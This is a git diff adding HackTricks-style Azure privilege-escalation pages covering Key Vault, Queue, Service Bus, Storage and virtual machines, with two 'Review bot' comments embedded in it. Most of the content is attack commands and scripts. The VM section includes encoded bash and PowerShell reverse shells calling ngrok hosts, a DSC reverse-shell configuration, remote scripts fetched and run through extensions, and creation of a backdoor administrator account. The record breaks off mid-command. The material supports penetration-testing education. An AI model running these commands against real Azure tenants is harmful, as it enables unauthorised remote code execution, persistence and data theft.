+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md new file mode 100644 index 0000000000..200b90d6d6 --- /dev/null +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md @@ -0,0 +1,60 @@ +# Az - Key Vault Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Azure Key Vault + +For more information about this service check: + +{% content-ref url="../az-services/keyvault.md" %} +[keyvault.md](../az-services/keyvault.md) +{% endcontent-ref %} + +### Microsoft.KeyVault/vaults/write + +An attacker with this permission will be able to modify the policy of a key vault (the key vault must be using access policies instead of RBAC). + +```bash +# If access policies in the output, then you can abuse it +az keyvault show --name + +# Get current principal ID +az ad signed-in-user show --query id --output tsv + +# Assign all permissions +az keyvault set-policy \ + --name \ + --object-id \ + --key-permissions all \ + --secret-permissions all \ + --certificate-permissions all \ + --storage-permissions all +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md new file mode 100644 index 0000000000..0d92f6fcac --- /dev/null +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md @@ -0,0 +1,109 @@ +# Az - Queue Storage Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Queue + +For more information check: + +{% content-ref url="../az-services/az-queue-enum.md" %} +[az-queue-enum.md](../az-services/az-queue-enum.md) +{% endcontent-ref %} + +### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/read` + +An attacker with this permission can peek messages from an Azure Storage Queue. This allows the attacker to view the content of messages without marking them as processed or altering their state. This could lead to unauthorized access to sensitive information, enabling data exfiltration or gathering intelligence for further attacks. + +{% code overflow="wrap" %} +```bash +az storage message peek --queue-name --account-name +``` +{% endcode %} + +**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services. + +### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/process/action` + +With this permission, an attacker can retrieve and process messages from an Azure Storage Queue. This means they can read the message content and mark it as processed, effectively hiding it from legitimate systems. This could lead to sensitive data being exposed, disruptions in how messages are handled, or even stopping important workflows by making messages unavailable to their intended users. + +{% code overflow="wrap" %} +```bash +az storage message get --queue-name --account-name +``` +{% endcode %} + +### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/add/action` + +With this permission, an attacker can add new messages to an Azure Storage Queue. This allows them to inject malicious or unauthorized data into the queue, potentially triggering unintended actions or disrupting downstream services that process the messages. 
+ +{% code overflow="wrap" %} +```bash +az storage message put --queue-name --content "Injected malicious message" --account-name +``` +{% endcode %} + +### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/write` + +This permission allows an attacker to add new messages or update existing ones in an Azure Storage Queue. By using this, they could insert harmful content or alter existing messages, potentially misleading applications or causing undesired behaviors in systems that rely on the queue. + +{% code overflow="wrap" %} +```bash +az storage message put --queue-name --content "Injected malicious message" --account-name + +#Update the message +az storage message update --queue-name \ + --id \ + --pop-receipt \ + --content "Updated message content" \ + --visibility-timeout \ + --account-name +``` +{% endcode %} + +### Action: `Microsoft.Storage/storageAccounts/queueServices/queues/write` + +This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks. 
+ +{% code overflow="wrap" %} +```bash +az storage queue create --name --account-name + +az storage queue metadata update --name --metadata key1=value1 key2=value2 --account-name + +az storage queue policy set --name --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name +``` +{% endcode %} + +## References + +* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues +* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api +* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md new file mode 100644 index 0000000000..ce5248f01b --- /dev/null +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md @@ -0,0 +1,177 @@ +# Az - Service Bus Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Service Bus + +For more information check: + +{% content-ref url="../az-services/az-servicebus-enum.md" %} +[az-servicebus-enum.md](../az-services/az-servicebus-enum.md) +{% endcontent-ref %} + + +### Send Messages. Action: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` OR `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action` + +You can retrieve the `PrimaryConnectionString`, which acts as a credential for the Service Bus namespace. With this connection string, you can fully authenticate as the Service Bus namespace, enabling you to send messages to any queue or topic and potentially interact with the system in ways that could disrupt operations, impersonate valid users, or inject malicious data into the messaging workflow. + +{% code overflow="wrap" %} +```python +#You need to install the following libraries +#pip install azure-servicebus +#pip install aiohttp +#pip install azure-identity + +import asyncio +from azure.servicebus.aio import ServiceBusClient +from azure.servicebus import ServiceBusMessage + +# Constants +NAMESPACE_CONNECTION_STR = "" +TOPIC_NAME = "" + +# Function to send a single message to a Service Bus topic +async def send_individual_message(publisher): + # Prepare a single message with updated content + single_message = ServiceBusMessage("Hacktricks-Training: Single Item") + # Send the message to the topic + await publisher.send_messages(single_message) + print("Sent a single message containing 'Hacktricks-Training'") + +# Function to send multiple messages to a Service Bus topic +async def send_multiple_messages(publisher): + # Generate a collection of messages with updated content + message_list = [ServiceBusMessage(f"Hacktricks-Training: Item {i+1} in list") for i in range(5)] + # Send the entire collection of messages to the topic + await publisher.send_messages(message_list) + print("Sent a list of 5 messages containing 'Hacktricks-Training'") + +# Function to send a grouped 
batch of messages to a Service Bus topic +async def send_grouped_messages(publisher): + # Send a grouped batch of messages with updated content + async with publisher: + grouped_message_batch = await publisher.create_message_batch() + for i in range(10): + try: + # Append a message to the batch with updated content + grouped_message_batch.add_message(ServiceBusMessage(f"Hacktricks-Training: Item {i+1}")) + except ValueError: + # If batch reaches its size limit, handle by creating another batch + break + # Dispatch the batch of messages to the topic + await publisher.send_messages(grouped_message_batch) + print("Sent a batch of 10 messages containing 'Hacktricks-Training'") + +# Main function to execute all tasks +async def execute(): + # Instantiate the Service Bus client with the connection string + async with ServiceBusClient.from_connection_string( + conn_str=NAMESPACE_CONNECTION_STR, + logging_enable=True) as sb_client: + # Create a topic sender for dispatching messages to the topic + publisher = sb_client.get_topic_sender(topic_name=TOPIC_NAME) + async with publisher: + # Send a single message + await send_individual_message(publisher) + # Send multiple messages + await send_multiple_messages(publisher) + # Send a batch of messages + await send_grouped_messages(publisher) + +# Run the asynchronous execution +asyncio.run(execute()) +print("Messages Sent") +print("----------------------------") + +``` +{% endcode %} + +### Recieve Messages. Action: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` OR `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action` +You can retrieve the PrimaryConnectionString, which serves as a credential for the Service Bus namespace. Using this connection string, you can receive messages from any queue or subscription within the namespace, allowing access to potentially sensitive or critical data, enabling data exfiltration, or interfering with message processing and application workflows. 
+ +{% code overflow="wrap" %} +```python +#You need to install the following libraries +#pip install azure-servicebus +#pip install aiohttp +#pip install azure-identity + +import asyncio +from azure.servicebus.aio import ServiceBusClient + +NAMESPACE_CONNECTION_STR = "" +TOPIC_NAME = "" +SUBSCRIPTION_NAME = "" #Topic Subscription + +# Function to receive and process messages from a Service Bus subscription +async def receive_and_process_messages(): + # Create a Service Bus client using the connection string + async with ServiceBusClient.from_connection_string( + conn_str=NAMESPACE_CONNECTION_STR, + logging_enable=True) as servicebus_client: + + # Get the Subscription Receiver object for the specified topic and subscription + receiver = servicebus_client.get_subscription_receiver( + topic_name=TOPIC_NAME, + subscription_name=SUBSCRIPTION_NAME, + max_wait_time=5 + ) + + async with receiver: + # Receive messages with a defined maximum wait time and count + received_msgs = await receiver.receive_messages( + max_wait_time=5, + max_message_count=20 + ) + for msg in received_msgs: + print("Received: " + str(msg)) + # Complete the message to remove it from the subscription + await receiver.complete_message(msg) + +# Run the asynchronous message processing function +asyncio.run(receive_and_process_messages()) +print("Message Receiving Completed") +print("----------------------------") +``` + +### `Microsoft.ServiceBus/namespaces/authorizationRules/write` & `Microsoft.ServiceBus/namespaces/authorizationRules/write` +If you have these permissions, you can escalate privileges by reading or creating shared access keys. These keys allow full control over the Service Bus namespace, including managing queues, topics, and sending/receiving messages, potentially bypassing role-based access controls (RBAC). 
+ +```bash +az servicebus namespace authorization-rule update \ + --resource-group \ + --namespace-name \ + --name RootManageSharedAccessKey \ + --rights Manage Listen Send +``` + +## References + +* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues +* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api +* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes +* https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-python-how-to-use-topics-subscriptions?tabs=passwordless +* https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +
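Review bot: The heading of the last section in this hunk lists `Microsoft.ServiceBus/namespaces/authorizationRules/write` twice, while the prose says the permissions allow "reading or creating" shared access keys; the second entry should be the action that reads the keys (`Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action`), otherwise the duplicate reads as a copy-paste slip. The `az servicebus namespace authorization-rule update ... --rights Manage Listen Send` example also only changes the rights on `RootManageSharedAccessKey` and never shows the key being read, and its `--resource-group` / `--namespace-name` flags have no argument, so the rendered page shows an incomplete command; if the placeholders were written as `<rg>`, GitBook drops them as HTML tags, so put them in backticks or use `$RG`-style names. Minor, in the Python block: the header says to `pip install aiohttp` and `azure-identity`, but the code imports only `azure.servicebus.aio` and authenticates with a connection string, and `max_wait_time=5` is passed to both `get_subscription_receiver` and `receive_messages`, which is redundant.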
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md new file mode 100644 index 0000000000..ed82ec6376 --- /dev/null +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md @@ -0,0 +1,180 @@ +# Az - Storage Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Storage Privesc + +For more information about storage check: + +{% content-ref url="../az-services/az-storage.md" %} +[az-storage.md](../az-services/az-storage.md) +{% endcontent-ref %} + +### Microsoft.Storage/storageAccounts/listkeys/action + +A principal with this permission will be able to list (and the secret values) of the **access keys** of the storage accounts. Allowing the principal to escalate its privileges over the storage accounts. + +```bash +az storage account keys list --account-name +``` + +### Microsoft.Storage/storageAccounts/regenerateKey/action + +A principal with this permission will be able to renew and get the new secret value of the **access keys** of the storage accounts. Allowing the principal to escalate its privileges over the storage accounts. + +Moreover, in the response, the user will get the value of the renewed key and also of the not renewed one: + +```bash +az storage account keys renew --account-name --key key2 +``` + +### Microsoft.Storage/storageAccounts/write + +A principal with this permission will be able to create or update an existing storage account updating any setting like network rules or policies. + +{% code overflow="wrap" %} +```bash +# e.g. set default action to allow so network restrictions are avoided +az storage account update --name --default-action Allow + +# e.g. allow an IP address +az storage account update --name --add networkRuleSet.ipRules value= +``` +{% endcode %} + +## Blobs Specific privesc + +### Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/write | Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/delete + +The first permission allows to **modify immutability policies** in containers and the second to delete them. 
+ +{% hint style="info" %} +Note that if an immutability policy is in lock state, you cannot do neither of both +{% endhint %} + +```bash +az storage container immutability-policy delete \ + --account-name \ + --container-name \ + --resource-group + +az storage container immutability-policy update \ + --account-name \ + --container-name \ + --resource-group \ + --period +``` + +## File shares specific privesc + +### Microsoft.Storage/storageAccounts/fileServices/takeOwnership/action + +This should allow a user having this permission to be able to take the ownership of files inside the shared filesystem. + +### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/modifypermissions/action + +This should allow a user having this permission to be able to modify the permissions files inside the shared filesystem. + +### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/actassuperuser/action + +This should allow a user having this permission to be able to perform actions inside a file system as a superuser. + +### Microsoft.Storage/storageAccounts/localusers/write (Microsoft.Storage/storageAccounts/localusers/read) + +With this permission, an attacker can create and update (if has ```Microsoft.Storage/storageAccounts/localusers/read``` permission) a new local user for an Azure Storage account (configured with hierarchical namespace), including specifying the user’s permissions and home directory. This permission is significant because it allows the attacker to grant themselves to a storage account with specific permissions such as read (r), write (w), delete (d), and list (l) and more. Additionaly the authentication methods that this uses can be Azure-generated passwords and SSH key pairs. There is no check if a user already exists, so you can overwrite other users that are already there. The attacker could escalate their privileges and gain SSH access to the storage account, potentially exposing or compromising sensitive data. 
+ +{% code overflow="wrap" %} +```bash +az storage account local-user create \ + --account-name \ + --resource-group \ + --name \ + --permission-scope permissions=rwdl service=blob resource-name= \ + --home-directory \ + --has-ssh-key false/true # Depends on the auth method to use +``` +{% endcode %} + +### Microsoft.Storage/storageAccounts/localusers/regeneratePassword/action + +With this permission, an attacker can regenerate the password for a local user in an Azure Storage account. This grants the attacker the ability to obtain new authentication credentials (such as an SSH or SFTP password) for the user. By leveraging these credentials, the attacker could gain unauthorized access to the storage account, perform file transfers, or manipulate data within the storage containers. This could result in data leakage, corruption, or malicious modification of the storage account content. + +{% code overflow="wrap" %} +```bash +az storage account local-user regenerate-password \ + --account-name \ + --resource-group \ + --name +``` +{% endcode %} + +To access Azure Blob Storage via SFTP using a local user via SFTP you can (you can also use ssh key to connect): + +{% code overflow="wrap" %} +```bash +sftp @.blob.core.windows.net +#regenerated-password +``` +{% endcode %} + +### Microsoft.Storage/storageAccounts/restoreBlobRanges/action, Microsoft.Storage/storageAccounts/blobServices/containers/read, Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action + +With this permissions an attacker can restore a deleted container by specifying its deleted version ID or undelete specific blobs within a container, if they were previously soft-deleted. This privilege escalation could allow an attacker to recover sensitive data that was meant to be permanently deleted, potentially leading to unauthorized access. 
+ +{% code overflow="wrap" %} +```bash +#Restore the soft deleted container +az storage container restore \ + --account-name \ + --name \ + --deleted-version + +#Restore the soft deleted blob +az storage blob undelete \ + --account-name \ + --container-name \ + --name "fileName.txt" +``` +{% endcode %} + + +## Other interesting looking permissions (TODO) + +* Microsoft.Storage/storageAccounts/blobServices/containers/blobs/manageOwnership/action: Changes ownership of the blob +* Microsoft.Storage/storageAccounts/blobServices/containers/blobs/modifyPermissions/action: Modifies permissions of the blob +* Microsoft.Storage/storageAccounts/blobServices/containers/blobs/runAsSuperUser/action: Returns the result of the blob command +* Microsoft.Storage/storageAccounts/blobServices/containers/blobs/immutableStorage/runAsSuperUser/action + +## References + +* [https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage) +* [https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support](https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support) + + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
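Review bot: Every command in this hunk has flags with no argument (`--account-name`, `--container-name`, `--resource-group`, `--name`, `--period`, `--deleted-version`, `--home-directory`), so the rendered page shows unusable commands; if the placeholders were written as `<account-name>`, GitBook drops them as HTML tags, so put them in backticks or use `$ACCOUNT`-style names. The `--has-ssh-key false/true` line should pick one value and explain the alternative in the comment, since `false/true` is not a valid argument. Wording in the same hunk: under `listkeys/action`, "list (and the secret values) of the access keys" should read "list the access keys (including their secret values)"; the `info` hint under immutability policies should say "you cannot do either", not "cannot do neither of both"; under `localusers/write` it is "Additionally" and "grant themselves access to a storage account", and "With this permissions" in the restore section should be "With these permissions". The action is cased `listkeys/action` in its own heading but `listKeys/action` in the restore heading; use one spelling.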
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md new file mode 100644 index 0000000000..b558868c53 --- /dev/null +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md @@ -0,0 +1,412 @@ +# Az - Virtual Machines & Network Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## VMS & Network + +For more info about Azure Virtual Machines and Network check: + +{% content-ref url="../az-services/vms/" %} +[vms](../az-services/vms/) +{% endcontent-ref %} + +### **`Microsoft.Compute/virtualMachines/extensions/write`** + +This permission allows to execute extensions in virtual machines which allow to **execute arbitrary code on them**.\ +Example abusing custom extensions to execute arbitrary commands in a VM: + +{% tabs %} +{% tab title="Linux" %} +* Execute a revers shell + +{% code overflow="wrap" %} +```bash +# Prepare the rev shell +echo -n 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64 +YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== + +# Execute rev shell +az vm extension set \ + --resource-group \ + --vm-name \ + --name CustomScript \ + --publisher Microsoft.Azure.Extensions \ + --version 2.1 \ + --settings '{}' \ + --protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}' +``` +{% endcode %} + +* Execute a script located on the internet + +{% code overflow="wrap" %} +```bash +az vm extension set \ + --resource-group rsc-group> \ + --vm-name \ + --name CustomScript \ + --publisher Microsoft.Azure.Extensions \ + --version 2.1 \ + --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \ + --protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}' +``` +{% endcode %} +{% endtab %} + +{% tab title="Windows" %} +* Execute a reverse shell + +{% code overflow="wrap" %} +```bash +# Get encoded reverse shell +echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName 
System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64 + +# Execute it +az vm extension set \ + --resource-group \ + --vm-name \ + --name CustomScriptExtension \ + --publisher Microsoft.Compute \ + --version 1.10 \ + --settings '{}' \ + --protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand 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"}' + +``` +{% endcode %} + +* Execute reverse shell from file + +{% code overflow="wrap" %} +```bash +az vm extension set \ + --resource-group \ + --vm-name \ + --name CustomScriptExtension \ + --publisher Microsoft.Compute \ + --version 1.10 \ + --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/33b6d1a80421694e85d96b2a63fd1924/raw/d0ef31f62aaafaabfa6235291e3e931e20b0fc6f/ps1_rev_shell.ps1"]}' \ + --protected-settings '{"commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File ps1_rev_shell.ps1"}' +``` +{% endcode %} + +You could also execute other payloads like: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add` + +* Reset password using the VMAccess extension + +{% code overflow="wrap" %} +```powershell +# Run VMAccess extension to reset the password +$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password +Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Name "myVMAccess" -Credential $cred +``` +{% endcode %} +{% endtab %} +{% endtabs %} + +It's also possible to abuse well-known extensions to execute code or perform privileged actions inside the VMs: + +
+ +VMAccess extension + +This extension allows to modify the password (or create if it doesn't exist) of users inside Windows VMs. + +{% code overflow="wrap" %} +```powershell +# Run VMAccess extension to reset the password +$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password +Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Name "myVMAccess" -Credential $cred +``` +{% endcode %} + +
+ +
+ +DesiredConfigurationState (DSC) + +This is a **VM extensio**n that belongs to Microsoft that uses PowerShell DSC to manage the configuration of Azure Windows VMs. Therefore, it can be used to **execute arbitrary commands** in Windows VMs through this extension: + +```powershell +# Content of revShell.ps1 +Configuration RevShellConfig { + Node localhost { + Script ReverseShell { + GetScript = { @{} } + SetScript = { + $client = New-Object System.Net.Sockets.TCPClient('attacker-ip',attacker-port); + $stream = $client.GetStream(); + [byte[]]$bytes = 0..65535|%{0}; + while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ + $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); + $sendback = (iex $data 2>&1 | Out-String ); + $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; + $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); + $stream.Write($sendbyte, 0, $sendbyte.Length) + } + $client.Close() + } + TestScript = { return $false } + } + } +} +RevShellConfig -OutputPath .\Output + +# Upload config to blob +$resourceGroup = 'dscVmDemo' +$storageName = 'demostorage' +Publish-AzVMDscConfiguration ` + -ConfigurationPath .\revShell.ps1 ` + -ResourceGroupName $resourceGroup ` + -StorageAccountName $storageName ` + -Force + +# Apply DSC to VM and execute rev shell +$vmName = 'myVM' +Set-AzVMDscExtension ` + -Version '2.76' ` + -ResourceGroupName $resourceGroup ` + -VMName $vmName ` + -ArchiveStorageAccountName $storageName ` + -ArchiveBlobName 'revShell.ps1.zip' ` + -AutoUpdate ` + -ConfigurationName 'RevShellConfig' +``` + +
+ +
+ +Hybrid Runbook Worker + +This is a VM extension that would allow to execute runbooks in VMs from an automation account. For more information check the [Automation Accounts service](../az-services/az-automation-account/). + +
+ +### `Microsoft.Compute/disks/write, Microsoft.Network/networkInterfaces/join/action, Microsoft.Compute/virtualMachines/write, (Microsoft.Compute/galleries/applications/write, Microsoft.Compute/galleries/applications/versions/write)` + +These are the required permissions to **create a new gallery application and execute it inside a VM**. Gallery applications can execute anything so an attacker could abuse this to compromise VM instances executing arbitrary commands. + +The last 2 permissions might be avoided by sharing the application with the tenant. + +Exploitation example to execute arbitrary commands: + +{% tabs %} +{% tab title="Linux" %} +```bash +# Create gallery (if the isn't any) +az sig create --resource-group myResourceGroup \ + --gallery-name myGallery --location "West US 2" + +# Create application container +az sig gallery-application create \ + --application-name myReverseShellApp \ + --gallery-name myGallery \ + --resource-group \ + --os-type Linux \ + --location "West US 2" + +# Create app version with the rev shell +## In Package file link just add any link to a blobl storage file +az sig gallery-application version create \ + --version-name 1.0.2 \ + --application-name myReverseShellApp \ + --gallery-name myGallery \ + --location "West US 2" \ + --resource-group \ + --package-file-link 